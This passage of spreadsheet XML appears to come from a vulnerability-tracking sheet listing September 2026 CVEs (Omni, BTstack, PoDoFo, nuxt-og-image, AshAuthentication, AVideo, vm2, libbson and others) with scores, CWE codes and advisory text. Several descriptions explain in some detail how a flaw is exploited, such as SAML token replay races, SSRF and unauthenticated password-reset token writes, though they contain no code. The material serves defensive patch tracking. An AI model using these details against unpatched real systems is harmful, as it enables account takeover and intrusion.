      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-367</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to 1.6.6 and from 1.7.0 until 1.7.3, SAML.getSession in internal/pkg/auth/interceptor/saml.go checks SAMLAssertion.Used and marks it used in separate state operations. Concurrent requests carrying the same captured saml-session token can each observe the assertion as unused and obtain authentication as the victim before either update is visible. The attacker can invoke SAML-protected gRPC endpoints, use ConfirmPublicKey to create multiple persistent credentials tied to the victim, and generate audit entries attributed to the victim, with the resulting access potentially affecting confidentiality, integrity, and availability according to the victim's privileges. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45720</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93015</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-787</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>BlueKitchen BTstack through 1.8.2 fails to validate the peer-reported endpoint count against table bounds in A2DP stream endpoint discovery. A bonded peer can send an AVDTP DISCOVER response with more endpoints than the fixed table holds, causing out-of-bounds writes that corrupt adjacent static objects and crash the process or sever event delivery.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93015</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54633</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>PoDoFo is a C++17 PDF manipulation library. From version 1.0.0 until 1.1.1, processing a crafted PDF with an Indexed color-space image can cause a heap out-of-bounds read in PdfColorSpaceFilterIndexed::FetchScanLine in src/podofo/main/PdfColorSpaceFilter.cpp. PODOFO_INVARIANT does not perform a runtime check, so a pixel index greater than or equal to m_MapSize can address beyond m_lookup. PdfColorSpaceFilterFactory::TryCreateFromObject also validates hival with an incorrect conjunction and no upper bound, allowing malformed Indexed color-space metadata outside the expected range. The resulting read can disclose adjacent heap data or crash the processing application. This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54633</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61793</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt-og-image</t>
        </is>
      </c>
      <c r="M242" s="5" t="inlineStr">
        <is>
          <t>6.7.0</t>
        </is>
      </c>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-20, CWE-441, CWE-749, CWE-918</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>Nuxt OG Image generates OG Images with Vue templates in Nuxt. From 6.0.2 until 6.7.0, nuxt-og-image exposes the unauthenticated /_og/d/** route when the documented defaults security.strict = false and security.secret = "" are used, and base64url-decodes the fonts parameter through decodeOgImageParams. Attacker-controlled fonts[].path values flow through loadDefinedFonts into the font-assets/node.js binding, which performs a server-side fetch without validating the URL scheme, origin, resolved address, or redirects. This permits blind requests to loopback, private, link-local, cloud metadata, and other internal HTTP services, while differences in the outer response status and timing can reveal service reachability. Slow targets can also occupy OG image render workers for the configured fetch and render timeouts. This issue is fixed in version 6.7.0.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61793</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78223</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Cryptographic Signature vulnerability in team-alembic AshAuthentication allows a caller of the token revocation action to neutralise a revocation or write arbitrary rows into the token resource.
AshAuthentication.TokenResource.RevokeTokenChange.change/3 reads the :token argument and decodes it with AshAuthentication.Jwt.peek/1, which delegates to Joken.peek_claims/1 and performs no signature check, unlike Jwt.verify/4. The jti, exp and sub claims it returns are written straight onto the revocation record, guarded only by byte_size(token) &gt; 0. Because expires_at derives from the attacker-chosen exp, a forged copy of a genuine token that keeps the real jti but backdates exp yields a revocation row that is already expired: expunge_expired removes it and the genuine token passes revoked? again. Arbitrary jti and sub values can be inserted the same way.
This issue affects ash_authentication: from 0.2.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78223</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89038</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>Verizon Cloud for Android (com.vcast.mediamanager) before 26.7.10 contains a path traversal vulnerability that allows co-resident malicious applications to write attacker-controlled bytes outside the intended staging directory by supplying a crafted _display_name value containing path-traversal sequences through exported activities OneTouchUploadActivity and PrintShopCloudActivity. Attackers can exploit the unsanitized filename concatenation in the file-staging sink via ACTION_SEND or ACTION_SEND_MULTIPLE intents to achieve arbitrary file write and inject attacker-controlled content into the authenticated user's Verizon Cloud account without user interaction.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89038</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92915</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit e01e41ecc (no patched version available) contains a broken access control flaw in objects/userVerifyEmail.php. The script disables the login requirement ($global['ignoreUserMustBeLoggedIn'] = 1), takes users_id directly from the query string, and calls User::sendVerificationLink() with no session requirement, no CSRF/global token, no relationship check between caller and target, and no enforceRateLimit() call. The only intended throttle is keyed to the caller's own session, so cookie-less requests are never limited. An unauthenticated remote attacker can therefore cause an arbitrary number of verification emails to be sent to any account ID, and can enumerate accounts and their verification status from the three distinct JSON responses ("Verification Sent", "Already verified", "Unknown error"). In addition, createVerificationCode() invokes $user-&gt;setRecoverPass() and saves the user, so each anonymous request writes a live password-recovery token onto the targeted account; that token is embedded in base64 in the verification link emailed to the account owner and is accepted by objects/userRecoverPassSave.json.php as the credential for setting a new password.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92915</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92936</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.0 through 3.11.6 leak absolute host filesystem paths to sandboxed code through error stack formatting. Attacker-supplied code can force the host-realm source transformer to throw a SyntaxError (for example by calling eval with malformed source) and then read the error's .stack property; the bridge forwards the .stack read to the host-realm formatter, bypassing the sandbox-side host-path redaction introduced for GHSA-v27g-jcqj-v8rw. The returned stack string discloses absolute paths from vm2, Node.js internals, and the embedding application's own source tree, along with host function names. Default new VM() and new NodeVM() configurations are affected without any special options, and the issue persists when string eval is disabled because the host-side transformer throws before eval is handled. The impact is information disclosure only; no code execution results. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92936</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93395</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>A missing lower-bound validation in the bson_new_from_buffer() function of libbson allows an integer underflow when processing BSON data with a zero-length prefix. The function reads a 32-bit document length from the input buffer but does not verify that the value is at least 5 (the minimum valid BSON document size) before using it in an array index calculation. When the length field is zero, the expression used to check the document's null terminator wraps to UINT32_MAX, causing a heap out-of-bounds read that crashes the process. An unauthorized party who can supply crafted BSON input to an application using this API can cause a denial of service.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93395</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81447</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to Information disclosure and Information tampering.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81447</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85717</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M249" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.14.5 to 2.16.0 and from 3.0.9 to 3.0.11, a client configured with a client-wide Realm and redirect following can disclose credentials after a cross-origin redirect because the Interceptors authentication path falls back to the client configuration after redirect handling clears the per-exchange realm. If the attacker-controlled target returns 401, the client can send Basic or Digest credentials or a Negotiate or NTLM token to that origin. Per-request realms are stripped correctly, and this issue is a residual bypass of the earlier cross-origin credential-stripping fixes. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85717</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86788</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>The HT Mega Addons for Elementor  WordPress plugin before 3.2.6 does not restrict the HTML tag name used to render the section headline in several of its widgets and blocks to a safe allowlist, allowing users with contributor-level access and above to store a crafted tag name that executes arbitrary JavaScript when the content is viewed, including by higher-privileged users who review or publish it.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86788</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91011</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>The EWWW Image Optimizer WordPress plugin before 8.7.7 does not properly escape image attribute values when it rewrites page output, allowing authenticated users with author-level access and above to inject arbitrary JavaScript that is stored in published content and executes in the browser of any user who later views the affected page.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91011</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92756</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-311</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>Applications built on MongoDB Entity Framework Core Provider which combine independent encryption settings and this provider's encryption settings may silently lose TLS and schema-map settings leading to protected fields being stored unencrypted in the database.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92756</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92757</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-311</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Applications built on MongoDB Entity Framework Core Provider which place a database name in the connection string may inadvertently disable field level encryption.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
